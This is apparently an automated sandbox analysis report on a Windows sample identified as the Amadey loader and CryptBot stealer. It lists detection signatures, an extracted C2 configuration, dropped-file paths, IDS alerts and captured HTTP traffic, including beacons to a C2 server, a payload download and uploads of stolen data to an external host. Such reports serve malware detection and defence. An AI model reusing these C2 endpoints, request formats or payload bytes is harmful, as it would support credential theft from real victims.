Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561321
MD5: 833012c3fea2d5fe7974d1cbba4fc697
SHA1: 1633e040bdf2fea553b1fa782b152081c86f403c
SHA256: c71570b0770028ad3e31c790390ab3ed7cb582b561cb5a775ea1bb541eb6967e
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.php;UN Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php2. Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpR Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000002.00000003.1772651146.00000000053E0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.43/Zu7JuNko/index.php2. Virustotal: Detection: 15% Perma Link
Source: http://185.215.113.43/Zu7JuNko/index.phpR Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 43% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: 843a4bb3a5.exe, 00000007.00000003.2486244593.0000000007092000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_4304a04a-7
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 13MB later: 24MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49762
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49792 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49856 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49866 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49895 -> 34.116.198.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 04:21:11 GMTContent-Type: application/octet-streamContent-Length: 4411392Last-Modified: Sat, 23 Nov 2024 03:09:05 GMTConnection: keep-aliveETag: "67414751-435000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 70 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 a0 c5 00 00 04 00 00 57 31 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 5d c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 5d c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 6e 6b 6f 75 77 79 6e 00 a0 1b 00 00 c0 a9 00 00 9e 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 79 79 62 69 6c 6d 73 00 10 00 00 00 60 c5 00 00 04 00 00 00 2a 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 c5 00 00 22 00 00 00 2e 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 34 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008348001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------Q8jjUN4EQEGEiLxuIFPku3Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 51 38 6a 6a 55 4e 34 45 51 45 47 45 69 4c 78 75 49 46 50 6b 75 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 61 77 65 6d 69 71 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d7 56 a9 0c 84 9f e8 ef 29 c5 fa c0 dd 12 36 1d dd e5 04 0b 8a fb e9 0b c5 dc 01 ed fc ee de a2 11 7b 8c ab 6a a1 77 65 fa 8a 0e 03 c5 dc 0b 05 d0 9d 23 ff c4 30 c9 15 30 d0 2c bf 61 f4 b2 f7 94 4f cc 7a 5e 83 fe 17 52 dd 4a 8f ba 9a 01 a8 af e7 55 6d 1c 28 a2 21 fd 66 c6 88 c6 45 b6 c5 5f 27 4d 40 8c d0 98 86 eb 41 53 18 fc de f7 4c 78 87 d7 ab 3b 21 54 5e 83 b9 84 b0 70 84 d8 1a 18 72 25 59 82 4f 2b 04 1a 69 82 e7 1b a6 e5 bc ba cf 6c 14 e8 ed c1 22 ed f9 32 07 79 e9 68 88 ba da 09 41 8a 75 3c ce e8 22 60 f3 ed 52 c0 60 95 45 4b ab cc e8 ed a6 45 29 59 ee 9f f0 05 40 87 88 28 06 86 5f 4a 3c eb 2f f4 aa 8a be b3 70 00 b5 42 bb 9f 65 01 d9 05 20 11 16 76 58 01 3e 17 5e ae 7d 5e 96 fd 18 54 35 59 39 e2 d0 9d 6b 83 4a 95 1b d5 f6 dd 56 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 51 38 6a 6a 55 4e 34 45 51 45 47 45 69 4c 78 75 49 46 50 6b 75 33 2d 2d 0d 0a Data Ascii: --------------------------Q8jjUN4EQEGEiLxuIFPku3Content-Disposition: form-data; name="file"; filename="Lawemiqe.bin"Content-Type: application/octet-streamV)6{jwe#00,aOz^RJUm(!fE_'M@ASLx;!T^pr%YO+il"2yhAu<"`R`EKE)Y@(_J</pBe vX>^}^T5Y9kJV--------------------------Q8jjUN4EQEGEiLxuIFPku3--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 63844Content-Type: multipart/form-data; boundary=------------------------wkEpLRm5MCFClRIK7ITIjVData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 77 6b 45 70 4c 52 6d 35 4d 43 46 43 6c 52 49 4b 37 49 54 49 6a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 75 70 69 78 65 6d 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 22 ea 85 07 d6 09 ae 72 8b 06 28 ac a9 f8 ab 9f 2f 84 16 c8 45 02 ed fc 88 b9 e3 2c 32 25 45 fb 78 3e ad dc fc ba 8e 91 8b ee 9d 86 bf 57 e7 8c ed 0b 99 ed ac df 5d fc 5d 1e 43 57 43 43 97 13 25 f5 62 ce 73 56 cc c8 fa 30 5a 10 8b 90 22 57 56 ee ab ba 46 73 11 22 f1 0f 07 ea ca e4 b3 41 fc 2a 5b 93 be 2f 64 15 02 d4 f6 4d 4c 27 23 32 02 6b 8a 77 55 7b d5 47 ec a3 cb de 6e f7 72 44 24 fc 7c 79 5d ea a9 97 b6 18 de 2f 56 4b 9b c2 5b ec 68 0b 15 7f bb 89 be 38 20 b9 75 d4 fc 06 c4 b5 67 34 37 9f 0d 98 f4 c0 44 0b 1d 0c c9 e7 c9 44 84 ef 03 0a a4 52 cc 8a ae 3f 60 b5 70 ae fa 01 e6 4c 4d 13 0e b2 46 67 aa ee 84 ad bc e0 a8 cd 61 53 bb 5d f1 7b 6b 8e 52 d4 f9 00 52 51 17 dd 0d a8 13 9f d0 26 cd 1d 02 26 57 df 92 18 b8 6b 44 64 e0 82 c4 8a 8d fa 2e 78 5d 14 6c 5e c6 37 39 e0 d3 54 c5 b8 ed a1 ab e1 76 96 b2 26 9d a1 30 c1 c7 a5 cc 56 6e ca ca eb 94 d4 f2 8d 30 64 42 c9 37 68 91 82 f8 42 51 ac 61 7a 4e f8 c6 6f 61 6d 9a 31 35 ca 62 4b ed 33 2b d3 d0 0f bd f2 7d fc 4e 14 44 c4 73 5f fa 0e 40 0a b8 f6 db e0 97 12 01 ff ca 75 d4 01 d2 27 e6 47 ed 0c aa 7d 88 1f 9c b4 ee 3f 8a a4 0e 40 04 a7 9d fc 65 bb d3 d3 8c 00 77 4d 2a c7 16 13 9d c3 79 8d c6 2e 56 14 d1 6a 1d b3 45 7d 2e 61 17 8a 80 27 90 cf 3f 97 75 dd a6 a0 bb 99 78 f5 00 3b f4 f4 80 a0 13 2d 17 8d e8 c5 a4 1a d7 3f b4 e3 1a de 47 d5 1d d3 94 d8 26 f0 6a c6 91 ae c6 84 53 0f 7b 67 c7 da 3a 6c 25 6c b4 44 da a0 b0 7a 0f 9b 2b b5 7c 1b 76 ae 82 cb 91 12 36 b6 54 a9 f4 0d 97 4e c0 3b 11 7c 99 3f 4a 49 07 4f a1 55 2c 4c 64 1c bc 80 d0 10 96 39 0b 64 a0 a2 16 a4 c9 59 23 63 78 8a 45 f8 ff dc 58 f5 33 c7 9e 90 07 43 4f 41 91 9b 4e f0 ce 69 50 3c 74 a9 09 68 e8 8e 86 5c 51 cf b2 a2 d8 70 1b df 7d 7e 31 4a b1 f2 24 db 02 fe 93 a4 03 2e c1 c6 e7 e9 26 28 01 0a 8f d6 c1 ec 0e 5f 7b c7 b1 f5 ab 16 17 a7 48 a3 68 88 4b ae 84 01 d0 c1 ce e9 90 16 f6 6a 50 ea f2 0f e3 69 43 81 f5 07 3a fa 32 18 28 20 8c 0b d0 45 ea 0b 4b e6 db e3 b3 fc 7b e5 35 f4 1e 9d 9e cb 79 e1 61 db 74 51 57 4f 1d c6 70 a7 6e 9c 2a e0 20 17 a7 c6 4c 9e 26 ed 92 55 3d e5 1d 3c 53 37 f2 e6 75 29 3a ee 75 af 01 63 fa 5a 0c 25 9f 22 eb e9 84 00 9e 58 ce 15 69 17 a2 f2 d7 23 56 d3 f2 8d 6c 0f 7b 8a 83 1d 58 12 95 c7 fa 62 46 1d a5 61 93 6f a0 bf 65 1f a3 84 ce 4d 4f 38 82 99 0b 2a 21 57 14 79 f1 ef d8 fb 11 e2 35 8f db 98 65 fa 5d b9 85 ae 7c 4d 6c 43 39 d2 2f ae d9 61 3a 2d 0e 07 16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 27813Content-Type: multipart/form-data; boundary=------------------------AIQgP6vCYofC0fm1zjXI8XData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 41 49 51 67 50 36 76 43 59 6f 66 43 30 66 6d 31 7a 6a 58 49 38 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 61 66 6f 70 75 64 69 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 22 f7 21 3d be 54 fe c8 43 92 69 f8 68 ec 2a aa e7 1b 20 97 b4 ff df b9 ae 7c 17 8b fc 6d 7a 93 1d f8 48 0b de 71 f6 ab 15 7b 9f 48 03 00 31 9b aa 30 f7 ee f0 63 86 5d c9 6c 2e ba f9 8d 23 11 e0 73 37 3f 73 23 03 3d 5d bb ed b2 82 0d 8e 46 f3 76 ca 8a 06 34 cc 81 e2 1e 42 db 08 f5 a4 0c 04 7c bc 44 93 81 1c 7b 54 0c 2e 96 f9 ea 33 02 d0 61 a2 f7 aa 5a 72 30 c6 ea e5 ac 53 f1 1e 27 a9 6a 51 f2 a3 4d 54 f8 1d d4 91 6c dc 38 28 ee 42 e4 8c 9b 9a 9f 33 20 62 70 